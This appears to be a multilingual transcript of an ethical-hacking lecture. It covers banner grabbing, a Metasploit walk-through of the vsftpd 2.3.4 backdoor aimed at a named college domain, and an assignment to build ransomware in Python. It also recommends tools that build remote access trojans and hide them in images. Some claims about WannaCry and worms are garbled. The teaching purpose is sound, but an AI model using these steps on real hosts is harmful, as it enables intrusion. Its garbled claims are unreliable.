ঈশান, আচ্ছা তিমির বলছে পিএইচপি, ভেরি গুড তিমির, পিএইচপি ঈশান 21 22 30 80, ডেফিনেটলি তিমির বলছে 21 21 টিসিপি নয় তিমির 21 এফটিপি, রণজিৎ এসএসএইচ, ওকে ফাইন, দেবকান্ত পিএইচপি, Sahil FTP, Sahil, very good. So all of you are right, and you know, if I am there in at your side, I would definitely love to first, you know, Google with few things. First, would love to find out the bugs on Apache version 2.4.3. This is point number 1. Then I would love to find out the bugs on OpenSSL version 1.0.0, because as far my knowledge is concerned, right now the OpenSSL version, you know, SSL stands for Secure Socket Layer, which gives the support for HTTPS comes with the support of OpenSSL layer. Now this is the lower version, I guess so, right? The current version is 2 dot something, but here it has been used the older version like 1.0.0. So every older version of software must have some bugs, you know. So I better search in Google that what are the bugs in OpenSSL version, this one. And then the next, the very juicy stuff is this one, which is PHP version 200% guaranteed. I mean, you know how many bugs you will get in at this PHP older version, you just can't imagine, right? And if you are a very good hacker, there's nothing, I mean, juicy like PHP version 5 till date, right? So you know, like just would love to give you one demo, but I don't know whether this MSF would work out here or not. MSF console, I don't know if there would be some bugs, I guess. Yes, but I need just 5 minutes of time just to show you one last thing to before concluding, you know, before conclusion of this session. And I'll be sharing you the PPTs which I would expect from your side, that you will be going through the PPTs and you will try by yourself, and those are very easy, you know, just look at the PPTs and job will be half done. Some of you have actually asked me in one of my classes that, sir, are you going to demonstrate, you know, like demonstrate something related to burp suite? So I have told I mean, I told at that time that yes, of course, if I can manage time, I will definitely demonstrate. But you know, burp suite is a very fantastic proxy kind of stuff. So the PPTs which I'm going to share, therein you will find the exact part of burp suite which you actually require, because anyhow we are going to use the community editions, means the edition which is there with us. We have no license for burp suite, so finally we cannot crack any password. So burp suite is one extensive, you know, utility, and you just can't imagine how fantastic software this burp suite is. That is actually probably the best proxy, you know, kind of software. So anyhow, I have added in the informations related to burp suite in my PPT. Just go through it. If you find any difficulties, definitely you let me know, as like Devkanto has asked for a doubt. So I will definitely be in my next class. If you counter any problem, I will definitely come up with the solutions next class. But I actually want you to get involved. You know, it's not like that every time I will be demonstrating, I will just be, you know, listening, and I will be sharing the recorded video. That's it. Job done. You have downloaded. Okay, fine. The resources are there with me, so I will see whenever I require. That should not be the case. You should also work with me. হ্যালো স্যার। বলো। স্যার ওয়ান্নাক্রাই র্যানসমওয়্যারটা কি? ওয়ানাক্রাই চিট বেরিয়ে গেছে, ঠিক আছে। ওয়ানাক্রাই ছিল মানে সব থেকে ডেঞ্জারাস সফটওয়্যার গুলোর মধ্যে, মানে সব থেকে ডেঞ্জারাস র্যানসামওয়্যার গুলোর মধ্যে একটা। তো এখন ওয়ানাক্রাই যখন বেরিয়েছিল মোটামুটি মাস 6 প্রচুর ভুগিয়েছিল লোকজনদের, কিন্তু ওই 5.5 মাস থেকে 6 মাসের মাথায় এক্সাক্ট চিটটা বেরোয়। মানে চিট মানে হচ্ছে অ্যাকচুয়ালি কি হয় তোমরা হয়তো জানো। Do you know guys, I mean, what is the work process of ransomware? I mean, if ransomware gets executed at any target computer, then what will happen? I mean, all of your you know, all of your data are going to be encrypted,
even if the name of the softwares which are installed, those are also going to be encrypted. Everything, every elements are going to be encrypted, you know. So none of the options would be visible to you, and none of the options you can work with, right? So that is a very dangerous situation. So in that way your system will also get hanged, and everything, I mean, all sort of botheration will start appear at one single, you know, click. So what you are actually asked, you will be prompted with a banner kind of stuff. Banner you can understand, right? A banner kind of stuff would get pop up at your place, and it would come up with the information that your system has been infected with this kind of ransomware, so that all the data are being encrypted. So what you require to do, you require to pay a certain amount at this certain, you know, certain way, right? And by paying this amount, what they will be doing, once the payment has been done successfully, they will be sharing the cheat sheet. We usually called it cheat, but you know that is actually nothing but the decryption code they are going to share. So you are the user who need to authenticate with your ID. You know, one ID usually gets generated once you will execute that ransomware by mistake at your place. One ID is going to be generated for you, and that is a, you know, that is a unique combination of username and password. That username and password you need to again feed at the time of running the decryption code, just to, you know, notify that yes, you are the user who wants to decrypt, who have already paid the amount, and then only the decryption would be possible. The decryption code will get run. Like, guys, we have found in many times that, I mean, I might have downloaded one zip file one when I have tried to, you know, when I'm trying to like execute or unzip that particular file, it is coming up with the option that this file is been password protected, so please type the password. That kind of stuff only happened before decryption. Also you need to justify that, you need to verification kind of process will take place, and just to verify that you have paid the amount or not, you again need to feed your, you know, given username and password. Yes, of course, if this is the case, then your decryption code will work, and entire stuff would get decrypted, and scenario will be like the, you know, like in proper way only. So that is how ransomware actually works. That is the behavior of ransomware. Now if you ask me, sir, how is it, I mean, how it gets executed, it's absolutely gets executed through browser, and browser is only the main culprit, you know. I mean, we need to be very cautious about acting, I mean, while browsing the websites, you know, always we need to be very cautious and very, very careful. You know, we should not browse this kind of websites like torrent and all this stuff. You know, those are really, really very dangerous. And believe me, my suggestion, take my words and take my suggestion, because you all are very mature students. Do not try to access this kind of, you know, I mean, wrong sites like some of the pornographic sites and all these sites from your browser at least, right? Because they are probably the most dangerous stuff, you know. I mean, very, very, very easily they can actually inject the kind of malware, because they have the unique technique to actually, you know, involve the user into the process. Whatever they do want to, you know, what I mean, the way they like, they will involve the user in that way only, right? So these sites are very dangerous. Anyhow, I'm lacking of time, so that I should, okay, about this particular stuff called you know, like কি নামটা ছিল হচ্ছে কি বেশ ওটা বললে, ওটা হচ্ছে WannaCry, right? WannaCry, I remember. WannaCry was a dangerous piece of software which has been built by someone. I forgot the name of the person who has actually built this, you know, ransomware. But the problem is that the decryption cheat was not available for long time, you know. And the guy was like, I mean, his intention was not actually to earn the money. His intention was in a, you know, he has probably WannaCry, जितना तक मुझे याद आ रहा है, ये आपका बहुत यूएस का बहुत सारे आपका जो इम्पोर्टेंट सर्वर थे, नासा का जो साइट्स का सर्वर, आपका यूएस व्हाइट हाउस के सर्वर, यहाँ पे बहुत ही इम्पोर्टेंट यूएस डिफेंस का सर्वर, यहाँ पे आपका WannaCry का एप्लीकेशन और इम्प्लीमेंटेशन हुआ था। तो इसका ऑब्जेक्टिव ये नहीं था कि पैसा निकालना है, इसका ऑब्जेक्टिव यही था कि इन लोगों को खतरे में डालना है, ठीक है। तो इनका चिट निकला, लेकिन बहुत टाइम तक इन WannaCry से हम लोग सफर किए, ठीक है। बट एक बार इसका डिक्रिप्शन कोड निकल जाता है तो फिर इसका कोई वैल्यू नहीं रहता है। तो अभी जैसे रैंसमवेयर हम लोग का प्रोजेक्ट है, तो आपको ना पाइथन से कोई रैंसमवेयर बनाना पड़ेगा, ठीक है। और आपको जैसे
जैसे एक हिंट हम आप लोगों को देना चाहेंगे, यू कैन टेक द हेल्प ऑफ गूगल ऑल्सो। सी आई मीन आई एम ऑलवेज वेरी फ्री, राइट। तो ऐसा नहीं कि आप गूगल का हेल्प नहीं ले सकते हैं, जो कोड हमने दिए हैं वही कोड लेके आप लोगों को काम करना है, ऐसा बात नहीं है। यू कैन ऑल्सो टेक द हेल्प ऑफ गूगल, बट दिस इज ऑल्सो वन ऑफ द वेरी one of the very good stuff of ransomware example. You can Google by typing PySum. One guy has actually written the entire script of this PySum, right? Script. तो ransomware PySum जब आप लोग देखेंगे, ये GitHub में अवेलेबल है, GitHub में अवेलेबल है। जब आप इसको एग्जीक्यूशन करेंगे तो आप देखेंगे इसका दो हिस्सा है। एक आपका सर्वर साइड प्रोग्राम है जो कि आपको एग्जीक्यूट करवानी है, और दूसरा आपका है इसका अटैकिंग फेज, जो कि क्लाइंट फेज का हिसाब से क्लाइंट में एग्जीक्यूट करानी है आपको, ठीक है। और इसका कंट्रोल जो होगा वो सर्वर साइड से होगा। दो अलग अलग टर्मिनल से आपको इसको लेके काम करानी है। तो जैसे करके आप गिटहब से पाइथन को सर्च करते हो तो इसका रेडीमेड पाइथन कोडिंग भी आपको मिलने वाला है। तो आपको एटलीस्ट एक आइडिया होगा कि हाउ टू राइट सम पाइथन कोडिंग फॉर राइटिंग द ransomware. PySum is one ransomware, and the guy has explained it very well, in a very well manner, and you will get it in a proper way. The files, all the files, you can download it from GitHub. Otherwise, probably you can recall that I have also shared few of the Python, probably one Python script that ransomware using Python, probably the name I cannot remember right now. So that script also you can go through it. That is also very good if you can understand. If it is very well explained, and it's a big file, almost 100 lines file, but it's a very good file, and very easy coding of Python. I mean, nothing that difficult to understand, very easy. So that file I have probably posted you in the WhatsApp group only. Anyhow, তো আমি যে পয়েন্টটাতে ছিলাম সেটা কনক্লুড করার জন্য, কি বলছিলাম সেটা তো ভুলে গেলাম। কি বেশ কি দেখানোর জন্য মেশিনটা খুললাম, যা কারো মনে পড়ছে? একটু হেল্প করো। কি দেখাবো বলে প্যারাটটা খুললাম গো। ওহো, ওয়ানাক্রাই, না না না, ওয়ানাক্রাই এর আগে দেবকান্ত তো ওয়ানাক্রাই এখন জিজ্ঞেস করলো, আমি তো এইখানে ছিলাম। ও এমএসএফ কনসোল, আচ্ছা আচ্ছা আচ্ছা, মনে পড়ে গেছে মনে পড়ে গেছে। এমএসএফ কনসোল, হ্যাঁ মনে পড়ে গেছে। আমি খুব তাড়াতাড়ি এটা আবার প্রচুর টাইম নেবে এমএসএফ কনসোলে। যাই হোক, দেখা যাক, টাইম নিলে কিছু করার নেই। আচ্ছা দেখো, আই ওয়াজ অ্যাকচুয়ালি ডিসকাসিং দিস পার্টিকুলার ফ্যাক্ট। খুব ভালো করে বুঝতে হবে তোমাদের সবাইকে যে এই ধরনের ব্যানার বা এইচটিটিপি ইনাম বা এইচটিটিপি হেডার্স এর মাধ্যমে এই যে ইনফরমেশন গুলো আমরা পাই, এগুলোর কিন্তু প্রত্যেকটা ইনফরমেশন আমাদের কাছে সমানভাবে গুরুত্বপূর্ণ। অল দ্য ইনফরমেশনস আর ইকুয়ালি ইম্পর্টেন্ট টু আস, এন্ড উইল বি টেকিং দ্য হেল্প অফ গুগল, রাইট, টু ফাইন্ড আউট অল দ্য বাগস হুইচ আর পসিবল আউট হিয়ার। এটা কিন্তু মাথায় রাখতেই হবে। জাস্ট সেটা দেখানোর জন্য এখানে করলাম। প্রবাবলি ইট ইজ গোয়িং টু টেক সাম টাইম, সো I don't want to waste your time. What I have a plan to demonstrate, see, this is also very important, this middle word called Unix, right? So I could get know that this target computer is running with Unix operating system, and I also have understood that this particular port number about this 21 port is open. So I will combine these two information, port number 21 is open on an Unix computer. These two words I will add, right? And I will come up with some of the exploitation parameters. So how we can find out the exploits in Unix operating system, and that too on the basis of FTP, right? FTP protocol. So guys, you can come up like use exploit. Earlier we were using exploit Windows, right? Exploit multi-handler. So we can type it like use exploit Unix, then FTP, then we can use some tap key combination, or it's always better if we can use the keyword called search, search then exploit then Unix, right? So all the Unix operating system exploitations would come, and therein you will find how dangerous this one. Especially I'm talking to Ishan, mainly because he's a student of GNIT. I should not, blame, but these element should be taken care of. I mean, since the Unix operating system is there and FTP port is open, this can come up with a very dangerous stuff. One payload right now I can recall, one payload which is absolutely built on Unix for FTP, and that payload probably named as FTP backdoor.
So probably, I guess, I'm not quite sure. FTP really very dangerous, and it can be executed on Unix only, Unix operating system. So it just asks for the, just ask for the target, IP address. That's it. Since FTP, they do not have any kind of this kind of authentications and all this stuff. So with this backdoor command, you can straight away go inside to the system. The prompt would come, and you can type ls to see all the files which have been uploaded at the target website, and you can do, you can run all the commands like ls, cp, move, all this rm, all this stuff to actually change something on the target computer. So so that is why always you should understand and you should consider the fact that whenever you are in a you are involved into somebody's website development, or somebody's website security aspect, you should not come up with, first of all, this old version of softwares. So always you should upgrade your software as far as the upgradation goes on, should come up. Number one, you should not leave these things like OpenSSL version 1.0.0. That definitely be a older version, so correspondingly, I guess this Apache is also must be an older version too, right? So you should upgrade all these things, and you should not leave this FTP and all these dangerous ports very open. It must be open, but there should be some filtered parameter on top of it, right? So it should justify whether you are a trusted user or not. Then only you will be allowed, otherwise you will be denied. So this kind of element should be taken care of. So anyhow, so since this is taking a lot of time, so I have already given you the hint that how you can proceed with. So but my last suggestion, please do not try it on a live site, because anyhow if you get trapped, you will be in a very bad situation altogether. So please control your this thing, I mean all this stuff. Better you can use this on the sites like this one, like, I mean, you can make a note of this site, which is very good as far as me, which is vulnweb dot test php, sorry, one name vuln, sorry, vuln, vulnweb dot test php, yes, test php dot vulnweb, sorry. So this is a website which is actually built for this kind of testing phase, so you are highly recommend is a live site altogether, and you can run all your testing at this particular site, because they are specifically meant for this reason only. This is actually a site of Acunetics. Acunetics is a fantastic Windows based software for, for bug analysis, right? What kind of bug you do have, and what kind of preventive measures you should take on these bugs to actually prevent this kind of, malicious attacks. And on this particular URL, you can, do anything and everything whatever you wish, right? If you change these options, you will come up with different, different like this thing. Here you can try it for SQL injection kind of attack, your card, this kind of different, different stuffs are there. Initially you are asked to log in, you can find the login credentials in Google only, how to log in, what is the username and password, because this is a site which is actually meant for, for practicing your this kind of stuff. So you are highly recommended do it by this thing. But it is not that I have demonstrated you about gnit.ac.in, so straight away after this class you start doing all kind of attacks at gnit.ac.in. So this is my request for your good purpose only, that do not please try and start using this kind of stuff directly on the websites which are live. You might be in a position of bother. স্যার পাসওয়ার্ড অ্যাটাকের জন্য ব্রুট ফোর্স নিজের কোনো অ্যাকাউন্টে ট্রাই করতে পারি? হ্যাঁ করতে পারো, ডেফিনেটলি করতে পারো। আর বলো, if anything else is there you can ask me, otherwise I will wrap up for today's session and I will share you the PPT immediately after completion of the class. আর তার সঙ্গে প্রজেক্টের ব্যাপারগুলো আমাকে একটু আপডেট করে দিও। নেক্সট ক্লাস প্রবাবলি তোমাদের শিডিউল অনুযায়ী মানডে, ওয়েডনেসডে, ফ্রাইডে যেটা ছিল, ফ্রাইডে তোমাদের নেক্সট ক্লাস হবে, এবং সেখানে আমি বলে দিচ্ছি আই উইল বি শোয়িং ইউ এসকিউএল ইনজেকশন। বলো দেবকান্ত।
ম্যালওয়্যার টাইপ কোনগুলো আছে, এইবার আমি দেবকান্তর গলাটি টিপবো। হ্যাঁ, একদম ছেলেটা কোনো রিসোর্স দেখে না। এ কত একটা দুর্দান্ত পিপিটি পাঠিয়েছি, দারুণ একটা পিপিটি পাঠিয়েছি, ভালো করে কাউকে জিজ্ঞেস করো। দেখো পিপিটিটার নাম হচ্ছে ম্যালওয়্যার টাইপস। ম্যালওয়্যার টাইপস, দেখো ম্যালওয়্যারের মধ্যে কি কি টাইপ হয়। ম্যালওয়্যারের মধ্যে হচ্ছে তোমার আসে হচ্ছে ট্রোজান, তোমার আসে হচ্ছে ভাইরাস, ওয়ার্ম, রুটকিট, তোমার আসে হচ্ছে র্যানসামওয়্যার, এই সবগুলোই হচ্ছে তোমার ম্যালওয়্যার। ঠিক আছে, তো এবার এই মানে যেটা ব্যাপার সেটা হচ্ছে যে আমরা ট্রোজান করেছি, আমরা ভাইরাসের ফাইল পাঠিয়েছি, ওয়ার্মের ফাইল পাঠিয়েছি, কিন্তু আমাদের বুঝতে হবে যে পিপিটিটা শেয়ার করেছি সেই পিপিটির মধ্যে পরিষ্কার মানে ভাষায় লেখা আছে যে এই সবগুলোর মধ্যে নেচার ওয়াইজ তো কিছু ডিফারেন্স আছে, নাহলে তো এগুলো আলাদা আলাদা নাম করা হতো না। যেরকম ধরো ভাইরাস, ভাইরাস হচ্ছে একটা সেলফ এক্সিকিউটেবল প্রোগ্রাম। ঠিক আছে, ভাইরাসের ইন্টেনশনটাই হচ্ছে খারাপ। মানে ভাইরাসের নেচারটা হচ্ছে এমন যে ভাইরাস যদি কোনো একটা ফাইলের দ্বারা যদি এক্সিকিউট হয় কোনো সিস্টেমে, অটোমেটিক ভাইরাস কি করে, বাদ বাকি ওই ড্রাইভে যত ফাইল আছে সবার ইন্টারনাল কোডিংটাকে হ্যাম্পার করে এবং পুরো সিস্টেমের ওই ড্রাইভটাকেই পুরো করাপ্ট করে এবং ফাইলের কন্টেন্টকে পুরো চেঞ্জ করে দেয়। ঠিক আছে, দ্যাট ইজ দ্য নেচার অফ ভাইরাস। কিন্তু দেখো অন দ্য আদার হ্যান্ড, তুমি যদি ভাবো যে ওয়ার্ম, ঠিক আছে, ওয়ার্ম কি করে, দেখো ওয়ার্ম কিন্তু ভাইরাসের মতো এতটা ডেঞ্জারাস নয়। ঠিক আছে, কারণ ওয়ার্ম কি করে, ওয়ার্ম যখন তোমার এক্সিকিউট হতে থাকে তখন ওয়ার্ম কি করে, ওয়ার্ম কিন্তু সেলফ এক্সিকিউটেবল প্রোগ্রাম, মানে নিজে নিজেকেই তোমার এক্সিকিউট মানে সংখ্যায় বাড়াতে থাকে। এবার যত ওর বাচ্চা বাড়তে থাকে, মানে ও হচ্ছে বাবা, এবার ওর যত সন্তান যত বাড়তে থাকে ও কি করে তত তোমার ড্রাইভে যে স্পেস আছে সেই স্পেসটা অকুপাই করতে শুরু করে এবং এই অকুপাই করতে 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 আলটিমেটলি একটা সময় আসে যখন তোমার কিন্তু আর কোনো জায়গাই থাকে না ড্রাইভে। তাহলে ওয়ার্মের ইন্টেনশন কিন্তু তোমার ওই রকম নয় যে ডেটা চুরি করা, ডেটাকে ক্র্যাশ করা, ডেটার পুরো ব্যাপারটাকে বদলে দেওয়া। হ্যাঁ, খুব বাজে রকমের ইন্টেনশন নয়, এটা শুধুমাত্র তোমার জায়গাটাকে অকুপাই করতে থাকে এবং তোমার স্পেস লিমিটটাকে কমাতে থাকে। ঠিক আছে, এটা দ্যাট ইজ দ্য ইন্টেনশন অফ দিস থিং। ট্রোজান আমরা দেখেছি ট্রোজান কি কাজ করে, তাই তো গো? ট্রোজান আমরা নিজেরা বানিয়েছি, আমরা বেল দেখেছি, আমরা দি ট্র্যাট দেখেছি, এগুলো রিমোট অ্যাক্সেস ট্রোজান, আমরা কাজ করেছি এগুলো নিয়ে, আমরা জানি। ঠিক আছে, আমরা এর সঙ্গে সঙ্গে আরো কয়েকটা তোমাকে এক্সাম্পল দিয়েছিলাম, যেরকম আমরা বলেছিলাম যে যারা যারা এগুলো নিয়ে কাজ করছো তাদেরকে একটা সাজেস্ট করেছিলাম যে দে শুড অলসো ট্রাই উইথ দিস টু সফটওয়্যার। এই সফটওয়্যার গুলো দুর্দান্ত সফটওয়্যার, আমি জানি না তোমাদের মধ্যে কজন করেছো এই সফটওয়্যার গুলো। একটা নাম দিয়েছিলাম EZSPLOIT, EZSploit। আচ্ছা, আর একটা নাম বোধহয় বলিনি, সেটা এখন বলে দিচ্ছি, ফেক ইমেজ EXPLOITER, ফেক ইমেজ এক্সপ্লয়েটার। স্পেশালি এটা তাদের জন্য বলার যে এই যে सॉफ्टवेयर फेक इमेज एक्सप्लॉइटर, এটা একটা অসাধারণ सॉफ्टवेयर, ये बहुत ही बढ़िया एक सॉफ्टवेयर है जहाँ पे आप एक्चुअली आप बनाने वाले हो एक ट्रोजन, मतलब एक रैट। दिस इज योर इंटेंशन, राइट? बट while building rat you can as well bind this rat with any image। that is why this is very good, you can bind this rat with any image, so that is why this is fake image exploiter। এটা গিটহাব থেকে সার্চ করতে হবে, ডাউনলোড করে কাজ করতে পারো। EZSploit, one of the best software to come up with the this kind of remote access trojan। আমরা বলেছিলাম আরো একটা সফটওয়্যারের নাম, I don't know, probably you all have forgot, and the name was venom। I told you guys, probably you can recall, the name was venom, VENAM। I don't know why it is not working, VENOM। this was again another software, venom। that is also a very good software for building this kind of rat। definitely yes, MSF venom is no, this is the software, actually only venom, right? This is not MSF venom, probably I have this software, I don't know। okay, just a second। search, no, CARSEARC, search FTP, FTP, exploit Unix,
See, you all can see I was talking about this particular backdoor. There are plenty of other backdoors also which comes up with this kind of combination. See, Unix operating system, FTP protocol, VSFTPD 234 dot underscore backdoor. So only I need to copy this backdoor. তাহলে একটা জিনিস ভাবো, তোমাদের সবাইকেই বলছি, এটা কিন্তু এমন একটা কোর্স যেটা একটা পুরো সুতোয় বাঁধা আছে, মানে তোমাকে সব সময় ইউ নিড টু থিঙ্ক অফ ইট, যে কিভাবে আমি যে ইনফরমেশনটা পেলাম সেটাকে আমি কিভাবে নিয়ে কাজ করতে পারি। ঠিক আছে, এবার দেখো আমি যদি এখান থেকে শো অপশনস করি, definitely I will get this one. তাহলে দেখো এখানে কোন ভ্যালুটা শুধু বসাতে হবে, টেল মি ইয়াশ, what value I do require to feed only? Q's? No, just see out here, ভালো করে দেখো, which value I require to feed, this is this value only, which is the R host value. R host means the remote host. So remote host कैसे करके निकालना है आपको, open tab कीजिए, ping, then gnit.ac.in. I won't be doing it so, but just to show you how we can actually do it. So what to be done, so I am going to copy this stuff, because I have found, I have run the this nmap, then minus script, then http, all this stuff, all the script to find out that okay fine, this particular port number is open, FTP service is also running, which is running with Unix operating system. So probably you all can recall, so I have used this combination, and since FTP port number is open, I have used this backdoor. So what I require to do, so set rhosts, set rhost, then control shift V, right, and then next onwards exploit. So so these are the stuffs which are very dangerous, and this is the way that you need to proceed. আচ্ছা, আমরা এটাকে নিয়ে আর আগে বাড়বো না, জাস্ট এটা আমি ভেতরে ঢুকে গেছিলাম বলে তোমাদেরকে দেখিয়ে দিলাম যে প্রত্যেকটা পয়েন্ট আমাদের কাছে ইম্পর্টেন্ট, রাইট। আমরা গুগল করতে পারি, সব সময় আমরা গুগল করব, এবং গুগলে আমরা দেখব যে ধরো গুগল, হ্যাঁ, আমরা সব সময় এটা সাহায্য নেব যে আচ্ছা আমরা দেখব ওপেন SSL 1.0.0 bugs, bugs or vulnerabilities, ঠিক আছে, দেখো নিউজ vulnerabilities 1.0.0 of OpenSSL, ঠিক আছে। এরকম ভাবে আমাদেরকে ভাবতে হবে, উই নিড টু থিঙ্ক, মানে এটা কোনো স্টিরিওটাইপ কোর্স নয় যে সবকিছু মানে এরকম ভাবে আসবে, ঠিক আছে, ব্যাপারটা কি তোমাকে বুঝতে হবে কিন্তু। হ্যাঁ, এবার দেখো APACHE Apache 2.3.4 bugs, BUGS or vulnerabilities, VULNERABILITIES vulnerabilities, এ দেখো 2.3.4 vulnerability, ঠিক আছে। এরকম ভাবে তোমাকে সার্চ করতে হবে, তোমাকে খুঁজতে হবে যে ভার্সন বা যে ধরনের ইনফরমেশন আমি পাচ্ছি সেখান থেকে আমি কি বার করতে পারি, এবং পসিবলি এই ভালনারেবিলিটি গুলো যেখানে লেখা থাকবে সেখানে তোমাকে বলাও থাকবে যে এগুলো কি করে প্যাচ আপ করতে হবে, মানে এর এক্সপ্লয়টেশনটা কিভাবে সেগুলো বলাও থাকবে, সেই অনুযায়ী তোমাকে এমএসএফ ভেনামে সার্চ করতে হবে, তোমাকে কাজ করতে হবে এগুলো নিয়ে, বুঝতে পারছো? তো এই জিনিসগুলো কিন্তু বুঝতে হবে। আচ্ছা, এবার প্রশ্নটা কি ছিল, দেবকান্ত বলছে ফ্যাট ট্র্যাকটাও তো হচ্ছে না, ছেড়ে দাও, ভুলে যাও, এখন আর ওইসব সময় নেই দেবকান্ত। ফ্যাট ট্র্যাক হচ্ছে না, ফ্যাট ট্র্যাকের জন্য পড়ে থাকলে চলবে না। হাজার একটা সফটওয়্যার আছে যেটা দিয়ে আমরা রাইড বানাতে পারি, তুমি রেল ইউজ করো, তুমি ভেনাম ইউজ করো, ঠিক আছে, তুমি অন্য কোনো কিছু ইউজ করো, তুমি এম্পায়ার ইউজ করো, প্লেন্টি অফ সফটওয়্যার আছে। কোনটা এখন তোমার বাগ হচ্ছে সেটা নিয়ে বসে থাকলে চলবে না। প্রাণেন্দু স্যার ইনস্টলেশনে এরা প্রবলেম হচ্ছে, ছেড়ে দাও, ভুলে যাও, যেটা প্রবলেম হচ্ছে এই যে ভেনামে তুমি লিখে যে প্রবলেম হচ্ছে, প্রাণেন্দু ছেড়ে দাও, এইসব এখন রিজলভ করতে গেলে মুশকিল, মানে এখন বিশাল জায়গায় কোথায় তোমার প্রিরিকুইজিটে ঝামেলা হয়েছে ভেনামে, হ্যাঁ, এ আমারও অনেক সময় হয়, ছেড়ে দাও, ভুলে যাও, বাদ দাও। হ্যাঁ, প্লেন্টি অফ সফটওয়্যার আছে, ওটা কাজ না করলে অন্য সফটওয়্যার দিয়ে কাজ হয়ে যাবে। ঠিক আছে, তাহলে বন্ধুরা এখানেই আজকে শেষ। হ্যাঁ, আমরা মোটামুটি একটা জিনিস দেখলাম, আইডিয়া পেলাম, 3টে পিপিটি আমি এখনই শেয়ার করে দিচ্ছি। হ্যাঁ, 10 মিনিটের মধ্যে পিপিটি গুলো বাড়িতে দেখো, আর আমরা শুক্রবার দিনকে মিট করব, এবং শুক্রবার দিনকে আমরা একটু এসকিউএল ইনজেকশন দেখবো। বাই দ্যাট টাইম আমি আশা রাখবো যে তোমরা এই পিপিটি গুলো সব ফলো করে নেবে।
ঠিক আছে, আর প্রজেক্টের ব্যাপারে একটু একটু করে আগে বাড়ো, ঠিক আছে। আচ্ছা ঠিক আছে। আচ্ছা আর একটা কথা, আচ্ছা ঠিক আছে, সেটা পরের ক্লাসেই না বলবো, ঠিক আছে। থ্যাংক ইউ।